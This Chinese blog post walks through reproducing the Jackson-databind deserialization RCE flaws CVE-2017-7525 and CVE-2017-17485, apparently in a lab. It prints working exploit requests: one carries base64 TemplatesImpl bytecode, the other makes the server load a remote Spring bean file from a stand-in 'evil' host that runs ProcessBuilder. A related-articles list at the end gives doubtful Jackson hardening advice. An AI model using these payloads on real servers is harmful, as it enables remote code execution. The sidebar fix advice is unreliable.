Jackson-databind 反序列化漏洞(CVE-2017-7525、CVE-2017-17485)

最新推荐文章于 2025-04-18 08:41:29 发布
最新推荐文章于 2025-04-18 08:41:29 发布
阅读量1.5k 收藏
点赞数 1
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzzzz1284/article/details/129496357
版权
文章详细阐述了Jackson-databind库中的PolymorphicDeserialization特性如何被滥用,允许攻击者通过JSON字符串实例化特定类,从而执行任意代码。两个具体的漏洞利用场景被提及,包括CVE-2017-17485,涉及TemplatesImpl类的命令注入,以及CVE-2017-7525的Spring框架XML应用上下文利用,通过远程bean定义文件触发命令执行。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

原因

Jackson-databind 支持 Polymorphic Deserialization 特性(默认情况下不开启),当 json 字符串转换的 Target class 中有 polymorph fields,即字段类型为接口、抽象类或 Object 类型时,攻击者可以通过在 json 字符串中指定变量的具体类型 (子类或接口实现类),来实现实例化指定的类,借助某些特殊的 class,如 TemplatesImpl,可以实现任意代码执行。

所以,本漏洞利用条件如下:

  • 开启 JacksonPolymorphicDeserialization,即调用以下任意方法

objectMapper.enableDefaultTyping(); // default to using DefaultTyping.OBJECT_AND_NON_CONCRETE

objectMapper.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_FINAL);

  • Target class 需要有无参 constructor

  • Target class 中需要需要有字段类型为 Interface、abstract class、Object,并且使用的 Gadget 需要为其子类 / 实现接口

复现

Jackson-databind 在设置 Target class 成员变量参数值时,若没有对应的 getter 方法,则会使用 SetterlessProperty 调用 getter 方法,获取变量,然后设置变量值。当调用 getOutputProperties() 方法时,会初始化 transletBytecodes 包含字节码的类,导致命令执行,具体可参考 java-deserialization-jdk7u21-gadget-note 中关于 TemplatesImpl 的说明。

使用JDK7u21的com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl作为Gadget,发送如下请求,将会执行touch /tmp/prove1.txt:

POST /exploit HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 1298

{
  "param": [
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    {
      "transletBytecodes": [
  "yv66vgAAADMAKAoABAAUCQADABUHABYHABcBAAVwYXJhbQEAEkxqYXZhL2xhbmcvT2JqZWN0OwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAcTGNvbS9iMW5nei9zZWMvbW9kZWwvVGFyZ2V0OwEACGdldFBhcmFtAQAUKClMamF2YS9sYW5nL09iamVjdDsBAAhzZXRQYXJhbQEAFShMamF2YS9sYW5nL09iamVjdDspVgEAClNvdXJjZUZpbGUBAAtUYXJnZXQuamF2YQwABwAIDAAFAAYBABpjb20vYjFuZ3ovc2VjL21vZGVsL1RhcmdldAEAEGphdmEvbGFuZy9PYmplY3QBAAg8Y2xpbml0PgEAEWphdmEvbGFuZy9SdW50aW1lBwAZAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwAGwAcCgAaAB0BABV0b3VjaCAvdG1wL3Byb3ZlMS50eHQIAB8BAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAhACIKABoAIwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHACUKACYAFAAhAAMAJgAAAAEAAgAFAAYAAAAEAAEABwAIAAEACQAAAC8AAQABAAAABSq3ACexAAAAAgAKAAAABgABAAAABgALAAAADAABAAAABQAMAA0AAAABAA4ADwABAAkAAAAvAAEAAQAAAAUqtAACsAAAAAIACgAAAAYAAQAAAAoACwAAAAwAAQAAAAUADAANAAAAAQAQABEAAQAJAAAAPgACAAIAAAAGKiu1AAKxAAAAAgAKAAAACgACAAAADgAFAA8ACwAAABYAAgAAAAYADAANAAAAAAAGAAUABgABAAgAGAAIAAEACQAAABYAAgAAAAAACrgAHhIgtgAkV7EAAAAAAAEAEgAAAAIAEw=="
      ],
      "transletName": "a.b",
      "outputProperties": {}
    }
  ]
}

CVE-2017-17485

CVE-2017-7525 黑名单修复 绕过,利用了 org.springframework.context.support.FileSystemXmlApplicationContext。

利用该漏洞,我们需要创建一个bean文件,放置在任意服务器上,如http://evil/spel.xml,内容如下:

<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans
     http://www.springframework.org/schema/beans/spring-beans.xsd
">
    <bean id="pb" class="java.lang.ProcessBuilder">
        <constructor-arg>
            <array>
                <value>touch</value>
                <value>/tmp/prove2.txt</value>
            </array>
        </constructor-arg>
        <property name="any" value="#{ pb.start() }"/>
    </bean>
</beans>

然后,发送如下数据包,使Jackson加载bean,触发漏洞:

POST /exploit HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 138

{
  "param": [
    "org.springframework.context.support.FileSystemXmlApplicationContext",
    "http://evil/spel.xml"
  ]
}

成功执行touch /tmp/prove2.txt。

原理: 利用 FileSystemXmlApplicationContext 加载远程 bean 定义文件,创建 ProcessBuilder bean,并在 xml 文件中使用 Spring EL 来调用 start() 方法实现命令执行

n1ght_X
关注
CVE-2020-36189 jackson-databind java反序列化漏洞
mirocky的博客
10-13 3570
该方法允许json字符串中指定反序列化java对象的类名,而在使用Object、Map、List等对象时,可诱发反序列化漏洞,导致可执行任意命令。com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource类中实现了url的输入和调用,通过可控的url进行payload的打入,即可依靠ObjectMapper的反序列化漏洞实现SSRF和RCE。,}]的形式,将对象的参数的类名打印,是json中的类名。
Jackson 反序列化漏洞
blackmagic的博客
08-07 2439
CVE-2017-7525Jackson 数据绑定库(jackson-databind)中的一个严重漏洞,允许攻击者通过反序列化恶意构造的 JSON 数据来执行任意代码。攻击者构造特制的 JSON 数据,包含 @class 字段,指向一个易受攻击的类(如 com.zaxxer.hikari.HikariConfig,该类在初始化时会执行某些操作)。在这个示例中,@class 字段指定了 com.zaxxer.hikari.HikariConfig 类,而其属性则是 HikariCP 数据源的配置。
Jackson-databind 反序列化漏洞CVE-2020-36179 ~ CVE-2020-36189)
weixin_45626288的博客
12-01 4391
2021年1月7日,jackson-databind官方发布安全通告,披露jackson-databind < 2.9.10.8存在多个反序列化远程代码执行漏洞CVE-2020-36179 ~ CVE-2020-36189),利用该漏洞,攻击者可远程执行代码,控制服务器。 2020年12月17日,jackson-databind官方发布安全通告,披露jackson-databind < 2.9.10.8存在反序列化远程代码执行漏洞CVE-2020-35490/CVE-2020-35491).
Jackson详解
最新发布
yk_dflkg的博客
04-18 528
Jackson是Java生态系统中最受欢迎的JSON处理库之一,由FasterXML维护。它提供了一套全面的工具来处理JSON数据,支持Java对象与JSON数据之间的转换,同时也提供了处理其他数据格式的能力。高性能:经过优化的代码使其成为最快的JSON处理器之一灵活性:提供多种处理JSON的方式和广泛的定制选项稳定性:经过广泛测试和使用,非常稳定可靠可扩展性:提供扩展API,支持自定义序列化和反序列化无依赖性:核心模块不依赖于其他库全面的注解支持:大量注解用于控制JSON处理行为数据绑定。
Jacksonjackson-databind
热门推荐
明月阁
12-09 6万+
原文链接:http://www.dubby.cn/detail.html?id=9070 前几篇介绍Jackson的文章(Jackson介绍,Jacksonjackson-core),虽然很好,但是我相信你并愿意在项目中使用,因为使用起来很复杂,也许这也是很多人愿意使用Fastjson的原因吧。为什么会感觉这么复杂呢,因为jackson-core提供的是很低级的API,我们可以充分的了解细节,
Jackson-databind引发的漏洞问题分析
kshzhaohui的专栏
03-25 8256
前言 最近公司内部提供了一份应用高危漏洞的清单,其中提到了fastjson和jackson,因为之前对fastjson因为多态问题引发的反序列化问题有过了解,所以打算也做一个简单的分析。 漏洞简述 2020年08月27日,360CERT监测发现 jackson-databind 发布了 jackson-databind 序列化漏洞 的风险通告,该漏洞编号为 CVE-2020-24616 ,漏洞等级:高危,漏洞评分:7.5。 br.com.anteros:Anteros-DBCP 中存在新的反序列化利用链,
Jackson-databind 反序列化漏洞CVE-2017-7525
玄道的网安博客
06-17 3840
漏洞原理 Jackson-databind 支持 Polymorphic Deserialization 特性(默认情况下不开启),当 json 字符串转换的 Target class 中有 polymorph fields,即字段类型为接口、抽象类或 Object 类型时,攻击者可以通过在 json 字符串中指定变量的具体类型 (子类或接口实现类),来实现实例化指定的类,借助某些特殊的 class,如 TemplatesImpl,可以实现任意代码执行。 所以,本漏洞利用条件如下: 开启 Jackso
Jackson-databind 反序列化漏洞CVE-2017-17485
玄道的网安博客
06-17 2047
漏洞搭建 cd /root/vulhub/jackson/CVE-2017-7525 docker-compose up -d 漏洞原理 利用 FileSystemXmlApplicationContext加载远程 bean 定义文件,创建 ProcessBuilder bean,并在 xml 文件中使用 Spring EL 来调用 start()方法实现命令执行 CVE-2017-7525 黑名单修复绕过,利用了 org.springframework.context.suppor...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
利用Vulnhub复现漏洞 - Jackson-databind 反序列化漏洞CVE-2017-7525
JiangBuLiu的博客
07-10 8476
Jackson-databind 反序列化漏洞CVE-2017-7525)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置CVE-2017-7525CVE-2017-17485 Vulnhub官方复现教程 https://vulhub.org/#/environments/jackson/CVE-2017-7525/ 漏洞原理 Jackson-da...
【jascon漏洞复现】CVE-2017-7525反序列化漏洞+CVE-2017-17485远程代码执行漏洞
serendipity1130的博客
09-01 2514
Jackson漏洞主要集中在jackson-databind中,当启用Global default typing,类似于FastJson的autoType,会存在各种各样的反序列化绕过类 区分Fastjson和Jackson: {"name":"S","age":21} {"name":"S","age":21,"agsbdkjada__ss_d":123} 这两个fastjson都不会报错,而jackson会报错,因为Jackson因为强制key与javabean属性对齐,只能少不能多 ke.
jackson-databind-vuln:Jackson Databind漏洞
05-26
杰克逊·德宾宾·沃恩 Jackson Databind漏洞
安全漏洞jackson-databind漏洞、 异常NoClassDefFoundError: Could not initialize class com.fasterxml.jackson
开着奥迪卖小猪
07-25 1万+
一、jackson-databind漏洞 国家信息安全漏洞库:http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201906-867 二、发现项目中有使用2.6.3版本的jackson,所以进行升级 jackson-databind 升级到2.9.9.1、 jackson...
Jackson 库的历史 RCE 漏洞,通常指的是 Jackson Databind 中的 反序列化漏洞,它在过去被广泛用于构造远程代码执行(RCE)攻击。这类漏洞利用了不安全反序列化过程
m0_58223765的博客
11-27 990
历史上,Jackson 确实存在严重的反序列化漏洞,攻击者可以通过泄露框架组件信息、版本号等,精确地利用这些漏洞进行组合攻击。为了防止此类漏洞的发生,建议开发者及时更新到修复过的 Jackson 版本,配置安全反序列化设置,避免泄露框架组件信息,并加强整体的应用程序安全性。
logstash的jackson-databind漏洞修复
洁哥哥的博客
06-06 1732
【代码】jackson-databind漏洞修复。
Jackson CVE-2017-7525 反序列化漏洞
王嘟嘟的博客
03-01 1093
Jackson 相对应fastjson来说利用方面要求更加苛刻,默认情况下无法进行利用。
jackson反序列化漏洞
l_l_c_q的博客
08-10 1793
jackson反序列化漏洞及POC
Jackson-databind 反序列化漏洞CVE-2017-7525&CVE-2017-17485
EC_Carrot的博客
07-03 904
漏洞详细 具体详细请移步:https://vulhub.org/#/environments/jackson/CVE-2017-7525/ 因为本人实在不懂这方面,只能先复现,然后慢慢磨了。 漏洞复现 CVE-2017-7525 发送以下数据包,即可执行touch /tmp/prove1.txt命令 POST /exploit HTTP/1.1 Host: your-ip:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en
kafka怎么修复FasterXMLJackson-databind反序列化漏洞
10-29
Apache Kafka是一个分布式流处理平台,它本身并不直接包含FasterXML Jackson-databind库。然而,如果你的应用程序依赖Kafka并且使用了Jackson库(包括Jackson-databind)来进行JSON数据的序列化和反序列化,那么可能会涉及到该库的安全问题。 针对FasterXML Jackson-databind的已知反序列化漏洞,通常需要采取以下步骤来修复: 1. **更新Jackson库**:检查你的项目是否使用的是受影响版本的Jackson-databind,如存在CVE漏洞(例如CVE-2019-14788)。如果有必要,升级到最新稳定版,官方会发布安全补丁。 2. **禁用自动解序列化**:由于某些攻击利用了自动构造函数注入的特性,可以配置Jackson禁用无参构造函数的自动创建。通过设置`ObjectMapper`的`DeserializationFeature.FAIL_ON_EMPTY_BEANS`属性为`true`。 ```java ObjectMapper mapper = new ObjectMapper(); mapper.configure(DeserializationFeature.FAIL_ON_EMPTY_BEANS, true); ``` 3. **限制敏感字段的访问**:对敏感数据进行适当的输入验证和过滤,避免恶意输入导致异常构造实例。 4. **启用安全模式**:在生产环境中,启用Jackson安全模式(`MapperFeature.SAFE_MODE`),这将阻止未标记为JSON的字段被反序列化。 5. **审计日志**:记录并监控所有反序列化操作,以便在发现可疑活动时快速响应。 6. **代码审查**:确保代码中没有滥用Jackson库,特别是在解析来自不可信来源的数据时。 请注意,修复过程可能因应用的具体结构而异。在实际部署前,建议进行全面的安全评估和测试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值